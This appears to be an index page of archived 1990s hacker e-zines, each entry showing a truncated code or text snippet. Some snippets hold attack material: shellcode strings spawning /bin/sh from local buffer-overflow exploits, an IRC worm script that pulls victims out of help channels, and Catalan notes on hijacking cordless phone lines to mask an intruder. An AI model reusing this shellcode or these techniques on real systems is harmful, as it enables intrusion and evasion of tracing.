#i

CatHack Issue 5

eZine's profile picture
Published in 
 · 2 days ago
... this. If you are going to do * anything with this code, learn from it. * * I remain, * * TFreak. * */ /* End of Hideously Long Header */ #include <stdio.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <arpa/inet.h> #include <sys/stat.h> #include <fcntl.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <ctype.h> #include <time.h> #ifdef LINUX #define __FAVOR_BSD /* should be __FAVOUR_BSD ;) */ #ifndef _USE_BSD #def ...

CatHack Issue 4

eZine's profile picture
Published in 
 · 2 days ago
... * converts port# to network byte order. * Therapy 10/29/96 9:00pm * */ static char sccsid[] = "@(#)pscan.c 1.0 (KRAD) 08/25/94"; #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #define MAX_PORT 1024 /* scan up to this port */ int s; struct sockaddr_in addr; char rmt_host[100]; int skan(port) int port; { int r; s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) { /* fprintf("ERROR: socket() failed\n"); */ /* Changed to printf for my Linux 1.1.18 box */ printf("ERROR: socket() failed\n"); ex ...

CatHack Issue 2

eZine's profile picture
Published in 
 · 2 days ago
... t (a ki li hem robat la conexio, ja sigui per recursos compartits pillar el pwl o amb el BO, etc) en veure ke akest no ha fet res, mirarien el caller #iD ke vem deixar en trucar, ke els donaria el telefon del nostre estimat vei. nyejejeje. Es a dir, el hack no tindria CAP relacio amb CAP de les nostres dades (ni conexio a inet, ni telefon...) Introducio: ~~~~~~~~~~~~~ Els telefons inalambrics funcionen tots com una emisora de radio i treballen en unes freqencies i canals determinats. Tots els telefons porten un o varis canals predeterminats quan son fabricats i no es poden variar sense obrir l'auricular del telefon. Hi han diversos models ...

CatHack Issue 1

eZine's profile picture
Published in 
 · 2 days ago
... canal i després chequeja ; que l'infectat no esta en cap canal d'ajuda (molt vil) if ( $me ison #nohack ) { /part #nohack } if ( $me ison #irchelp ) { /part #irchelp } if ( $me ison #mirchelp ) { /part #mirchelp } if ( $me ison #operhelp ) { /part #operhelp } if ( $me ison #help ) { /part #help } if ( $me ison #helpdesk ) { /part #helpdesk } if ( $me ison #help-desk ) { /part #help-desk } if ( $me ison #helpcenter ) { /part #helpcenter } if ( $me ison #dalnethelp ) { /part #dalnethelp } } on 1:NOTICE:I hate your guts with a passion:*:/quit Waa! Some one told me off. }DM2{ ; o sigui amb un /not ...

Leeto Phreako Headz Issue 5

eZine's profile picture
Published in 
 · 6 days ago
... s however incomplete, not a full security program, and most likely has plenty of vulnerabilities itself. It is used just to demonstrate this concept. #include <stdio.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #define PORT 3 #define BACKLOG 1 //Port Tripwire BETA //made for BSD or any ipfw firewalled OS //by phractal int main() { //printf("PortScan Tripwire BETA by phractal \n"); int fd=socket(AF_INET,SOCK_STREAM,0); int fd2; struct sockaddr_in server; struct sockaddr_in client; int sin_size; serve ...

JJF Hackers Team Journal 7

eZine's profile picture
Published in 
 · 1 week ago
... dows and Mac networking (especially * involving TCP/IP), fluent in C and C++, and working on becoming a * proficient Windows programmer. * */ #include <stdio.h> #include <string.h> #define BUFFER 30 int DecodeCharOne(unsigned char *); int DecodeCharTwo(unsigned char *); int DecodeCharThree(unsigned char *); int DecodeCharFour(unsigned char *); int DecodeCharFive(unsigned char *); int DecodeCharSix(unsigned char *); int DecodeCharSeven(unsigned char *); int DecodeCharEight(unsigned char *); main() { int i; /* Generic counter */ int eocc = 0; /* Records if there has been an error */ /* The following structu ...

JJF Hackers Team Journal 6

eZine's profile picture
Published in 
 · 1 week ago
... emas operativos Linux. http://www.ccc.de File : getresponse.cc ------------ Codigo Fuente --------------------------------------------------- #include "getresponse.h" #include <stdio.h> #include <string.h> #include <stdlib.h> #include <ctype.h> #define private private_hack extern "C" { #include <sio.h> #include <sct0.h> #include <sc.h> } #undef private int timeout; SIO_INFO* si; Byte selectfile[] = { 0xa0, 0xa4, 0x00, 0x00, 0x02 }; Byte gsm_file[] = { 0x7f, 0x20 }; Byte gsm2_file[] = { 0x7f, 0x21 }; Byte get_res[] = { 0xa0, 0xc0, 0x00, 0x00, 0x00 }; Byte verify_pin[] = { 0xa0, 0x20, 0x00, 0x01, ...

JJF Hackers Team Journal 5

eZine's profile picture
Published in 
 · 1 week ago
... overflow program, but just running this is easier. USAGE OF THIS DOES NOT GIVE YOU TECH SUPPORT SO DON'T ME°AGE ANYBODY ON IRC ABOUT THIS. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> char *shellcode = "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04" "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb" "\xcd\x80/" "/bin/sh" "0"; char *get_sp() { asm("movl %esp,%eax"); } #define bufsize 2048 char buffer[bufsize]; main() { int i; for (i = 0; i < bufsize - 4; i += 4) *( ...

JJF Hackers Team Journal 3

eZine's profile picture
Published in 
 · 1 week ago
... * converts port# to network byte order. * Therapy 10/29/96 9:00pm * */ static char sccsid[] = "@(#)pscan.c 1.0 (KRAD) 08/25/94"; #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #define MAX_PORT 1024 /* scan up to this port */ int s; struct sockaddr_in addr; char rmt_host[100]; int skan(port) int port; { int r; s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) { /* fprintf("ERROR: socket() failed\n"); */ /* Changed to printf for my Linux 1.1.18 box */ printf("ERROR: socket() failed\n"); ex ...

JJF Hackers Team Journal 1

eZine's profile picture
Published in 
 · 1 week ago
... ep for thc-magazine issue #3 12/12/96 - works also on umount ------------------------------------------------------------------------- */ #include <stdio.h> #define lv_size 1024 #define offset 30+lv_size+8*4 // ------------------------------------------------------------------------- long get_sp() { __asm__("movl %esp, %eax"); } // ------------------------------------------------------------------------- main(int argc, char **argv) { char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\x ...
loading
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT